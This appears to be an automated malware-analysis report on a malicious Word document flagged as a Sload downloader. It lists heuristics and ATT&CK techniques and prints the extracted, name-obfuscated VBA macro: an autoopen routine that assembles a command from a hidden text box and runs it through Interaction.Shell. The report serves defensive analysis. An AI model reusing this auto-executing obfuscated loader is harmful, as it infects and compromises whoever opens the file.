MALICIOUS
292
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro. The 'autoopen' subroutine, along with critical heuristics like 'OLE_VBA_SHELL' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC', indicate that the macro is designed to execute arbitrary code. Specifically, the presence of 'SC_STR_CMD' and 'SC_STR_POWERSHELL' firings suggests the macro attempts to invoke system commands or PowerShell, likely to download and execute a secondary payload. The ClamAV detection 'Doc.Downloader.Sload-6786417-0' further supports this downloader functionality.
Heuristics 10
-
ClamAV: Doc.Downloader.Sload-6786417-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Sload-6786417-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Set SIOuCuXzHMGkQKVZZMoBKG = BWkihBGwTdqtVJKD BvLLi = Array(WlaVLv, bLvNY, PpwBNm, Interaction.Shell(tHUaIkk, nOBksY), aQzQP) Select Case WobDQDQUjCLRikJVzhfX -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() fZfbF -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Reference to PowerShell high SC_STR_POWERSHELLReference to PowerShell
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11572 bytes |
SHA-256: 5e0781f7ad1abe314cf155edc1fd6ae829aac77f03b6acd5b1ea27a790e8ef64 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
309 of 350 identifiers look randomly generated (e.g. 'ulFrjJiawUvPzmCLICQmvCGF') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "XTzcjasLs"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
fZfbF
End Sub
Attribute VB_Name = "XrLnRQJJqddWhD"
Function fZfbF()
On Error Resume Next
Select Case wRJzodfHKzrHOzVitsKcmjq
Case 28336665
lIasjJamAJzkaMbQKocpI = jjRAzPQFRbEQDVEO
pRUNpXtTfjMbrNPabbr = Log(jMKVurWjJJGLwNmXnwq)
XjRjEiZNpqbtNnsd = 46042415
TwBNJWdAiibrmflfDCviRQRI = ThMwJUJQpdsKKXvCEzumzDw
Case 50705491
jqichDjsWqoQCVJSbzBtU = 297703414
zbMQWWsPkFPZianHZLRn = Log(GlCdlUWFuOOqLiBVmJWd)
DLmwirnqchCFwtpKmlB = 145760435
qqBjTsmmmBuJFCaQ = Log(GdjPSjLkMpLKAYVHQNUkN)
End Select
Set wAEpfIvsqPuEfYmu = JqwHDbbmdZCppFfUui
Select Case rKlFfCkcKIlcPtbJVtki
Case 79014147
LDOaYXmvwskuwqMGrNAR = QEiYIAGupWGQLziqEd
qPMtsUwlzOCXiuLu = Log(fCPXfAHViilqiQmjnbFELqDL)
JfmzbWzFjLCOpKOEX = 91561221
LuTwQnqSGqnowDHWUUWCIm = uEjVzRqzncNAVqhWLlDsO
Case 317626379
EKiotkBLiYJYtjSsBP = 284442662
LlDmjnwKREtWwi = Log(LPczOlRfbLRnptsBdXwK)
GwHGlqudfmaLBHdYS = 186196710
uFbaPAJRYCQzCXMET = Log(rduWBwYqbomOdLvhQN)
End Select
Set VsFcZVaOnYooCKDbzTXD = BYYUfJZFDUGzZzclAVBb
Select Case ulFrjJiawUvPzmCLICQmvCGF
Case 104852227
uSMRFMkBPditKuAUJSNXGs = icaQhDriAbtPQNh
jfwWYhOsWlbsossjB = Log(hoivCwYziSQfkGcD)
sKWjwOhuwbzqHjJNFfsk = 263917251
wwZDwbqAVQkPAZibkazB = WZJWiHRiajSpPLY
Case 65103670
RFDvGiFrjjjiuSmmWbZQjNU = 161900265
ujRakNGRrIrzLQqDfz = Log(izfRfCskztMDlfZLCoR)
VdNDJvpKLiMBNvpWPPlYsdGX = 208235592
GSmEnPNBCFlcHkN = Log(YQjKpppCwnCtGsWqXEoWY)
End Select
Set vzoMtkkmHAKJEqq = ORcjIANUvKjvFDwqJS
Select Case azCMNDccczNwALsCEC
Case 146960193
zaYhRLwsiqfYiSuHwY = ToWrOYCWqDAJWZw
zbVvBFkwlRpShQlGfu = Log(iciKIPpHpdjJwj)
vjadGOEYFwikoaRtdbXQsQQN = 211186359
zuUFIrljUFjCoodE = NaiAhXkChaPFfPNzuQKD
Case 3504904
qwEFMNbnjmnnDmBLQWkCaQ = 145312446
ppTFtXTAcYjjwcKXatrc = Log(sLavjAnTzNacaPWtW)
LTmKiDVOoLMchZtLwisJKXf = 217964709
LJDVModEAjJfhjWaUMbG = Log(jAjPTsBNjnoFfTuRtb)
End Select
Set jXjsjjOzWipLDaJfIUG = vcqQsUZCNcIbkEXzzIziEui
Select Case NGLGswtzPWjDDN
Case 317598670
zGAncwTzEjTmFYjCYPtiIo = CbJqrKVavHFbiZkY
nNCJfHsrqdinTRiKu = Log(MSHbniIXizzzdnrirumDXUQz)
jrmbqbQoaYFHLa = 134419769
HdtusArwoajYqb = BIbHrWvoXjICOlXfURDPqXF
Case 52043167
zqnPsrwzjEwkTddLpVNk = 326581122
KRuOGnLBiDTbrfIYfoK = Log(ihYvBoZEBBrXiX)
VVdlKnfZvRsmwCQqZZuu = 193603507
wNSNHzcLvsTAmDCDzQCHdiJ = Log(bBlLSwodCdWQSz)
End Select
Set jzjVzSzQNoVZdrVPUDQm = ORtzDqzJjlkCjVK
Select Case ERviYisJDiDkOHdirUMBQPV
Case 286766586
TWBGbltACXiKBiCilRjSaiY = pzZkWcowEnELqCcsKkMk
TpqJXfzoYQpwWRcMIdZjmGO = Log(qoipnIqSolVJjbwzqHf)
PNUlAjBGnBHNbQTjwI = 2945696
ZXKkvSchibsfbqKcT = pHHkfmdIiSIPAiHPzsDjphDU
Case 180962310
IclkGqPzStIpsXHn = 236601212
ZPaKXLtSZkHHDnIT = Log(BWwMRABPOHHAjcCztvMk)
EaqoQisKpVhYsFRlzHPZuJEl = 119558283
IFKKrwifzwHYAVIEYlabnWl = Log(vnzLEuVEVYWnAfdk)
End Select
Set NIUiZGtRplTLqFlTwODzXb = aCCcwVDsIplaOQ
Select Case DSoJVFwEIwcQrWZoOQlYD
Case 272940126
YMWSAThulQcSnqNhKuRnfl = jmzVzlPDfOcPwznwkaDr
ODmwAibdlBKnjpfCwhJVNzEK = Log(QiXwjMbucRiKXwDoZtM)
bNJHvmstVmRzcXjzD = 219496697
oitGYzrbjGhnErs = DZPBuTiYqAjizPDksoYjiHlK
Case 21949520
JnnzMHjYjanjKUAU = 106356873
NJbTDzvPTJQvnFzjKu = Log(qnbzbicwMiDiNrNwujqkq)
wnaIlmiiaKFjZj = 249589119
zlaAilQaCEZIDzTK = Log(mqoYTzpNdDsdiSiKjkFKpVLX)
End Select
Set FjNZibqunmszljnkmFiXzYmv = TPOAGRfQZNQcozcCiqflNwDR
Const nOBksY = 0
Select Case jmkuSDKWinznHrpAiTd
Case 136736458
PpmAvnRqvaYzmEjb = IAqjmjhiEUwQvV
pNQwzuWQsjjMaqUnFYcK = Log(iidFFRrSSazFtHYomdHm)
zzCXGsjhsrTKDKjmqsdiz = 171598839
jGjiwwTuUYrhiah = YIlZijvqzoBvliHnXsSRaJni
Case 169223328
wmLdELJuEWMAYDKqlHzXIqQE = 64828483
HQYPVCAkiJiTjpmrZlbXUP = Log(jYflCoHVHTTEsWp)
JAnVBLRXHkRRfd = 255107008
sJoqpRzwaoXAQluVj = Log(SXhtFYGHdRXqpijBLjhwL)
End Select
Set CqvNoRGVqwhvLPkwDQjinjZ = wtTPaKnkYaUqwskpBIbbJ
Select Case JMvSMWiWXMTkVwYRTkJUvti
Case 4011724
abOwUNiqBXSJfNhrjZALm = zzhFCTVzPiuhmv
ZDzltUZFHnXccOUhoz = Log(bQOPKPVEHoPwbmXGWBa)
farZRirsivwFiLUDKnoWXQR = 114039684
pvqFHzjOGuBYozjXdVMsJPP = TviMEUPIahcjBnazP
Case 286695508
QSiVqIwuuFZjZfYlMPU = 63169830
itwHUzWquOcRozzpasEGaV = Log(BwCDdCOivhplZj)
VLcEzqwRljYwlWPDL = 64498236
wIStsnjjjjwNaILWsdWVME = Log(RWEGcLfiicijFDRjQTKPh)
End Select
Set TwnazXZpoisbBXnhDUBFUl = ZGTbuGBBoAiDGSCLIEpnEri
Select Case cDLzjLRifaYwLuYmF
Case 236756876
WjFwXmhXqQwsvAL = zSdiHzBpAPnHmUbJ
GikXHoLznbNhhdwAjYUbBzYi = Log(vHzZlWpowoVbnsiSj)
WoHTmqHDvHhuJFFILh = 80035092
CFYsloaYvfqJSdCqHcV = ShahHBfPVihwGJR
Case 112505020
OhzPiHPRXcfDPAjLD = 47738957
iqlkILDQwtDILlasuX = Log(jaKQkYAMFiwkCCwmZdzoEfq)
XUTTSpIooKXuTaALI = 334873604
mAIAFPwAOzjoEjtsPEjtPWKw = Log(iCTzdmfFjERPTNETptqFWTK)
End Select
Set hlGcFiQpLIbMfBlLDiX = bdvrbaacTrVLstRsfDAw
Select Case QDVqAFjYWXCDNz
Case 14286292
WnwfEKQtURiiGAH = XqOwLjruqLhLjjIonasZwhz
mcViWESWQKfWlFv = Log(vDotdFKkJuqfHhvqtIKjNJ)
ltKvYElDhiFissEchSk = 161334711
OmPiOpdcvLZlfDzTKljY = IABDDzojdQdluXGvMKPHamT
Case 207200612
MoFJWhDAlFlNfLrpvSvwAkj = 294563860
zaRQQWhWKqIjXGjZkJR = Log(hjzXSfUXisbIMlYGmj)
jDrVUiGXLLXPbPXqRb = 302794474
kBJnSOAWmhcmBniRqKioMHIM = Log(cAsovHismlhtDDFh)
End Select
Set liikOohGzGwFlctzcpOIh = ZwuOBAXnHYGcWddaNLLivAh
Select Case AiCJorBXcXlodCzfUjlt
Case 126697762
zEqRhiraTOiQwNW = SWrpwoJtDYisYzc
MsizTWJXjBEWKMEkJORO = Log(dILvwOJzwCUlwE)
iYmvMUJwkmjqTuj = 67835953
NiikXCWIAYhzklLIwGkbW = jULbINYpEOrmXT
Case 145109486
GWPnMvbzzBXhVnziLM = 328240618
YwuJjKTTHzNsmczN = Log(joktObHpqUROJbLV)
zKcFDCcIpCnfvto = 248939544
cXMTJUmUtpCEwWBWdf = Log(lGfmIlZYUJvbcdmzoIonpp)
End Select
Set KMZDqjlJROzAQwlEikwSK = OZbMWNNprzvUVZihisiAiNdd
tHUaIkk = XTzcjasLs.TextBox1.Text + wAciJ + EGDtX + bWzEvaLV + pUJJinGY + aiEEi + DkKSB + CqdYa + iFCpnQuz + opOmsjt
Select Case tqmLIOtFdOQAZsRRjjRzjw
Case 159085602
zQwRAwwWPRCqsQpmmMGV = kkWGtwzbmGwRHLsS
FhStlIpbZPriMWqCROfa = Log(HzwvdLFYkFzTKHYD)
zcjiTiGwZjGPqwMsRw = 237351975
wHwjCpKtLCPSwzOCtj = OszEczIuIkasIokVsfzciY
Case 83763926
WToQshKzlKVbwCUjtvCJk = 67158936
dOcWWvDJqfOiILs = Log(aabHwTJWpLNijV)
AMMKCQLnDhAivk = 136693081
YBtcjJDIKFFjLiVa = Log(cNVvAplOnXZzoNlUzp)
End Select
Set ptUrJEAzKfbVLaJTXwQY = HNvldKWsULMtpkbH
Select Case UCwjPhzVnlQwZrjwhMk
Case 62701598
BCBoWPFlGkdmABomclEcCfv = nKYHwRtFTjTAuutR
khAmKYpsKFafhqVGnBLqwpp = Log(XSQiorhrmkSwuadljPmMSam)
wtGtiatusJOrIGESXiswXWM = 85009957
ZHiDcYzjWkvknJLrYGk = lddLTojhqWbjtVIT
Case 68157354
PlRLlWJhjZjEzQbAmwdXko = 266583239
qAIOrSArhhrzuarGC = Log(EKAlWLEsiMqmGawAVlOuqR)
oXSZcGMEXVzjdQFiwJw = 234869250
BubQCuFGsHvnlLNEmcmWHS = Log(IqSkQHRkrhkndqIZM)
End Select
Set wfOBwsErZKhLNjj = SZjJpwaWEFBYkNiCaOJn
Select Case wMPwcuYDHJVhbfoFDjfqiLfT
Case 206558303
YSkruTpwwFuIGwAGzloYthWY = BZjOkjwThWFTQOCrijjLv
hpcMufGCqwLIstGhNYwp = Log(bumjWmhOAnNnYsumYmR)
ifJHHWIlzSKNGCGv = 271974188
XtZnqJwVTBMupmjduvkf = AiwRhcAhWlwzvOYnrpA
Case 60365705
CGYCdXjdHKKKBXPcWIjwoz = 105311353
ztYIqDGkVowXXPEF = Log(EObnntrIKVjUKwEqLE)
zXmEEaoNYrFGEaikjoZKz = 214806972
fiZPLpthMKTGwRKWNzjSREOb = Log(jOVBlukSXHWiKcYfJtwkUhS)
End Select
Set SMLTOibTzWiaXjaPjnZ = nrCWImHLSqZwvwiZ
Select Case MXwJjKICkzRVbZuVhIXLChYB
Case 223978794
ZZFtLVWkRNCNMRDdYizws = iPPLOdsiwubwljwqnvwqHjT
wFIZIuClsjvqiAHtsm = Log(HlNjUjiqDzBlzwuPI)
TVEsqFEoGMnoFwURLi = 229534311
osaDwnruzujkwYYQKPv = bfaWDPsDQfkMjjh
Case 173519319
AuCOJqMcCpjZDHwnazISEAi = 308565788
dRJXEPrwVKVttRpNtAaLiN = Log(nYFlYHqzLHajYCFwZpa)
wbuhjSFLzIiJQsWwwiSqf = 70441711
lSlQKoBAWDfcLdYF = Log(CizDYRPfjGAuXjB)
End Select
Set SIOuCuXzHMGkQKVZZMoBKG = BWkihBGwTdqtVJKD
BvLLi = Array(WlaVLv, bLvNY, PpwBNm, Interaction.Shell(tHUaIkk, nOBksY), aQzQP)
Select Case WobDQDQUjCLRikJVzhfX
Case 35180200
kZkdXKsiXLpdjafPjqHMPF = ElpFINBuwXfDCSnjGbCfA
BEiqhzoQtaisfrhFkQW = Log(sFAXcwwKAkNajcklW)
fDFjiFYKmvwBrlIkj = 318342455
LNlBiQIMELDHvi = kTKMauwSJAMwtbRwt
Case 262077770
LEuBbPWtUwjoCSYBpZWVI = 86534094
cBRROkmOJTNXOqRiwEBdUZL = Log(jUabWWSazJRAJwHI)
jZUovKLYraRGjaDpIluKK = 290469863
BnZFYRYzztvkzrVkKODfvA = Log(OiOLBMMzXrmTBVFmHS)
End Select
Set UMnpDwmAkwHMrATLWKFW = kwYtMXTPEbwMSjHasKMOM
Select Case QawqLwTlvbzjFiWzVZFbIoT
Case 190393607
HiZWhfKUQjwXVZjjHM = KPCjuFQjPXmcGTWDOtPOwmLo
YbzzZvAcWSFEwfQQwuwdHrD = Log(WSnrzAXDOoVdRjqclzjAQwPO)
zzsPKnhXzdGIJiWvCqJJmzRE = 132091822
HHDiXDZsADfoDBoGRDkUcVN = OIGEMwfnvSfZURG
Case 20953660
RdTQOnHVjhOUzQmuzTOzU = 205263489
XrskWOlAzjlKru = Log(AVwijRRTvCsiXzrGOmcvYV)
lGujRnOFvAIStz = 249792918
kGXzidkODFaXYPwQfSMcllAj = Log(wziPizHcnrpBXTHWjcLMr)
End Select
Set fBrnbmJMwFrPlfFzZITuk = JPIwEGFIpTqPRcXrWU
Select Case OQPLbImPzvZbrLQUE
Case 94400184
TdQXwVrbiKqwCcjkAC = rGSTfGWKlAjoHzATmwt
pjjIEIzWzLaQRdXNAK = Log(QaLGbzWiwBItlGjkHZKOW)
zKZZQXdcmScOdsic = 36354091
iZwUqRoJhtPoqvOG = AjBjwFVOpRXdrGiUwfw
Case 71022157
UIlGpkNwcjAWQiwEijUd = 40476887
zQjqmkUrPRvzjY = Log(ZJVIQNlXGbciPUwch)
TIUawzcilQiaTzYoFZw = 140253874
nOtaPKCEXTpOYNPvzKYflb = Log(pfHiKaOWdMifubzjma)
End Select
Set OzsMukItGPapELtEuHj = dIwMCqhVUzblFMNXwTNtBhI
Select Case tmPTCTmiMNnFUQtU
Case 253541542
SWiLFNjkdwfCFsjWsMMq = FTSEOCTkVhZjiRZhihB
RppCJIuYwYhHvCMCMHqLQ = Log(HOGWabGpKfLHJQ)
QuGHulzARlbEXVaqpTRh = 176400183
niTRJOCwoswXwNkDVOKOplwW = TjoVnsjDUHXoccjwUwjHz
Case 163724978
GlzCWMGCjwipiNaB = 149075
UbGMPtmbPUoPOjvW = Log(kpqMqNEnrtmEktvjuiwGt)
EQvwlNUiwuIjqLJBdO = 8553705
YzzXfatjUEwPnOlaQuc = Log(TJvrwEDjZtBiFUzFQYRLUoN)
End Select
Set wsscajkjmKGODIbaXJGbDPJ = QfKscQWivBvDLbJpIR
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.